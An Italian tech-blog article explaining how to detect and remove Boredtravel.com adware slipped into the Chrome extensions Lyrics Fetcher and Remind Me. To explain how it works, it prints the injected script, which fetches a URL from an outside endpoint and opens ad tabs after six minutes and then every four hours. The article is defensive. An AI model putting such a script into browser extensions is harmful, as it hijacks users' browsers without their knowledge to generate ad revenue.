Il tuo browser Chrome potrebbe essere infetto dall'adware Boredtravel.com

Un adware che apre pop-up su Boredtravel.com è scivolato in alcune estensioni di Chrome. Ecco come individuare e rimuovere questo virus.

Identificare e rimuovere l'adware Boredtravel.com

Uno script dannoso è stato inserito nell'ultimo aggiornamento di diverse estensioni di Chrome. Questo script apre il sito Boredtravel.com all'insaputa degli utenti, a intervalli regolari di tempo. Le estensioni infettate da questo script sono Lyrics Fetcher e Remind Me, dell'utile sviluppatore web.

Questo adware non è pericoloso in quanto apre solo una pagina pubblicitaria. È comunque inquietante lasciare che si verifichi questa pratica dubbia.

Identifica l'adware

Per identificare l'adware, basta analizzare il comportamento del tuo browser:

  • Chiudi Google Chrome e riavvialo.
  • Attendere 6 minuti dopo l'apertura del browser. Se il tuo browser è infetto, si aprirà una scheda sulla pagina boredtravel.com dopo esattamente 6 minuti. Questo accadrà anche ogni 4 ore

Elimina adware

La rimozione è semplice e veloce:

  • Controlla le estensioni di Chrome: se sono installate una o più delle estensioni sopra elencate, probabilmente il tuo browser è infetto.
  • Per rimuovere questo adware, è sufficiente disabilitare o rimuovere le estensioni in questione.

I casi sono stati identificati per le estensioni Lyrics Fetcher e Ricordamelo, ma potrebbero non essere i soli. È possibile che l'adware sia presente anche sull'estensione Modalità bambino, un'estensione dello stesso sviluppatore.

Non è chiaro se lo sviluppatore di questa estensione abbia aggiunto deliberatamente lo script dannoso o se sia stato fatto da un hacker. Per precauzione, ti consigliamo di disabilitare o rimuovere tutte le estensioni da questo sviluppatore.

Le estensioni sono state segnalate a Google, lo sapremo presto. Se altre estensioni hanno lo stesso problema, non esitare a farcelo sapere.

Sostituisci estensioni

Ecco alcune estensioni alternative:

Il lavoro di Boredtravel.com

Il principio è semplice, lo sviluppatore o un hacker ha aggiunto uno script nelle estensioni interessate. Questo script, che viene eseguito in background, indica al browser di aprire una pagina pubblicitaria a intervalli regolari. L'obiettivo per lo sviluppatore o l'hacker è che la pagina di destinazione viene aperta più volte. Ciò consente di aumentare il numero di visualizzazioni del sito Boredtravel.com e di aumentare le entrate correlate.

Ecco il codice che è stato aggiunto nell'estensione. Ho aggiunto commenti verdi per capire meglio

<script>


// fonction qui ouvre un pop-up 6 minutes après le démarrage de Chrome
  setTimeout(function () { 
    $.ajax({
      url: "https://demo7530752.mockable.io/url",
           /* cette URL génère un lien du type
                https://ourshort.com/?g/BNHzHJJ */
      async: false,
      dataType: 'json',
      success: function (data) {

   //ouverture du lien généré, qui redirige ensuite vers Boredtravel.com
        var newURL = data.msg;
        chrome.tabs.create({ url: newURL }); ;
        intervalWebsite() /* appel de la fonction qui ouvre
                           un pop-up toutes les 4 heures */
      }
    });
  }, 6 * 60 * 1000) // 6 x 60 x 1000 millisecondes = 6 min


// fonction qui ouvre un pop-up toutes les 4 heures
  function intervalWebsite() {
    setInterval(function () {
      $.ajax({
        url: "https://demo7530752.mockable.io/url",
             // comme dans la première fonction
        async: false,
        dataType: 'json',
        success: function (data) {

          // comme dans la première fonction
          var newURL = data.msg;
          chrome.tabs.create({ url: newURL }); ;

        }
      });
    }, 240 * 60 * 1000)// 240 x 60 x 1000 millisecondes = 240 min = 4h
  }


</script>

fonti: https://www.reddit.com/r/techsupport/comments/dkt1si/boredtravelcom_virus_none_of_my_scanners_are/

Leggi anche: Abilita doppia autenticazione sui tuoi account online (2FA) https://currenttrends.fr/internet/2fa-double-authentification/

Circa l'autore

Immagine di Romain Royer
Romain Royer
Sono molto interessato alla tecnologia, alla musica, alle questioni ambientali e a vari altri argomenti. Sviluppando i media Current Trends, il mio obiettivo è condividere con voi le mie conoscenze, le mie scoperte e i miei consigli sui vari argomenti che mi affascinano. Lasciami commenti, mi aiutano a migliorare e sono sempre apprezzati.

20 € offerti sui tuoi prodotti biologici francesi

Ottieni uno sconto di 20 € sui tuoi prodotti biologici francesi

Aimez-vous ce contenu ?

Aiutaci a migliorare la qualità dei nostri articoli raccontandoci i tuoi suggerimenti

Si prega di scorrere verso il basso per i commenti

20 € offerti sui tuoi prodotti biologici francesi

Ottieni uno sconto di 20 € sui tuoi prodotti biologici francesi

Soutenez-nous

Supporto
notiziario

commenti

sottoscrivi
Notify of
ospite

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.

2 Commentaires
Most Voted
Newest Oldest
Feedback in linea
Visualizza tutti i commenti
Fernando Peña
Fernando Peña
5 years ago

Ho questo problema ma non conosco nessuna delle estensioni che hai citato.

Immagine di blocco annunci fornita da Code Help Pro

Rilevato blocco degli annunci!

Disattiva il blocco degli annunci quindi aggiorna la pagina.

La pubblicità è essenziale per sostenere la nostra iniziativa e garantire l'accesso continuo a contenuti di qualità. Queste pubblicità svolgono un ruolo chiave nel finanziamento di infrastrutture critiche, come hosting e nomi di dominio, nonché nel pagamento dei nostri autori.

Ci impegniamo a garantire un'esperienza utente piacevole. Pertanto garantiamo l'assenza di finestre pop-up o pubblicità animate sul nostro sito. Tutti i nostri annunci sono discreti e non invasivi.

Aggiungi currenttrends.fr alla tua whitelist e aggiorna la tua pagina.

Ti ringraziamo per la comprensione e ti auguriamo un'ottima navigazione.